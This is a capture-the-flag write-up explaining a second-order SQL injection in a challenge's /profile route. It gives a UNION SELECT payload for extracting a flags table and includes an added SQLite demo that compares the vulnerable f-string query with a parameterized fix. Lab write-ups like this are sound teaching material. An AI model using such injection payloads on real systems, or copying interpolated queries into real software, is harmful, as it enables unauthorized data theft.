Second Breakfast

Challenge Overview

This challenge consists of analyzing init.sql and app.py from the source code we're given.

init.sql:

CREATE TABLE flags (
    flag TEXT
);

We have some endpoints in app.py like /login and /register which appear to be well-secured, passing user input as query parameters via %s placeholders. But in the /profile route we can clearly spot a SQL injection, since the username is interpolated straight into the query string:

query = f"SELECT username, created_at FROM users WHERE username='{username}'"

Since the vulnerable query is in the /profile endpoint, we can assume that this is not a classic SQLi injected through the /login or /register path, but through our account's username: the payload is registered as the username and is executed when the profile is looked up.


Exploitation

Note: This is not a blind SQLi, since we have the source code and can see that the query returns 2 columns (username and created_at). Otherwise, we could use ORDER BY 1, ORDER BY 2, etc., to guess the number of columns.

The solution is to use a UNION-based attack, which combines the results of two or more SELECT queries. Because the original query returns username (text) and created_at (timestamp), the injected SELECT must return the same two columns with compatible types.

After a Google search I found the CURRENT_TIMESTAMP() MySQL function. We could also use whatever timestamp we want in MySQL format.
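The following is an added example, not code from the challenge's app.py or from the write-up's author. It rebuilds the two tables in an in-memory SQLite database (the users table's columns are inferred from the /profile query; the rows and the flag value are constructed placeholders) and contrasts the challenge's f-string query with the parameterized form the write-up attributes to /login and /register. Because SQLite does not accept the MySQL CURRENT_TIMESTAMP() call syntax, the payload is written with CURRENT_TIMESTAMP and no parentheses; the placeholder style also differs (SQLite uses ?, MySQL drivers use %s). The function names are my own.

```python
import sqlite3

# Constructed sample schema and rows. The page's init.sql only shows the
# flags table; the users table's columns are taken from the /profile query.
SCHEMA = """
CREATE TABLE users (username TEXT, created_at TEXT);
CREATE TABLE flags (flag TEXT);
INSERT INTO users VALUES ('alice', '2024-01-01 00:00:00');
INSERT INTO flags VALUES ('FLAG{constructed_placeholder}');
"""

# The write-up's UNION payload, adapted to SQLite: CURRENT_TIMESTAMP without
# parentheses. Column count (2) and types (text, timestamp) match the original
# SELECT, which is what makes the UNION succeed.
UNION_PAYLOAD = "' UNION SELECT flag, CURRENT_TIMESTAMP FROM flags -- -"


def open_db():
    """Create an in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def profile_vulnerable(conn, username):
    """Same shape as the challenge's /profile query: the username is pasted
    into the SQL text, so a single quote in it terminates the string literal
    and whatever follows is parsed as SQL."""
    query = f"SELECT username, created_at FROM users WHERE username='{username}'"
    return conn.execute(query).fetchall()


def profile_safe(conn, username):
    """Parameterized form: the driver sends the username as a bound value, so
    it can never change the query's structure. SQLite uses '?' placeholders;
    MySQL drivers use '%s' with the same two-argument execute() call."""
    query = "SELECT username, created_at FROM users WHERE username=?"
    return conn.execute(query, (username,)).fetchall()


def demo():
    """Run both query styles with a benign username and with the payload."""
    conn = open_db()
    results = {
        "vuln_benign": profile_vulnerable(conn, "alice"),
        "safe_benign": profile_safe(conn, "alice"),
        # The f-string query returns the flag row from the second SELECT.
        "vuln_payload": profile_vulnerable(conn, UNION_PAYLOAD),
        # The parameterized query looks for a user literally named like the
        # payload string and finds nothing.
        "safe_payload": profile_safe(conn, UNION_PAYLOAD),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

Running it shows the two functions agree on a normal username and diverge only on the payload: the interpolated query yields a row whose first column is the flag, while the parameterized one returns an empty list. The fix is the same regardless of which endpoint the username entered through, which is why validating only /login and /register is not enough.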


Final Payload

' UNION SELECT flag, CURRENT_TIMESTAMP() FROM flags -- -

made by k0d
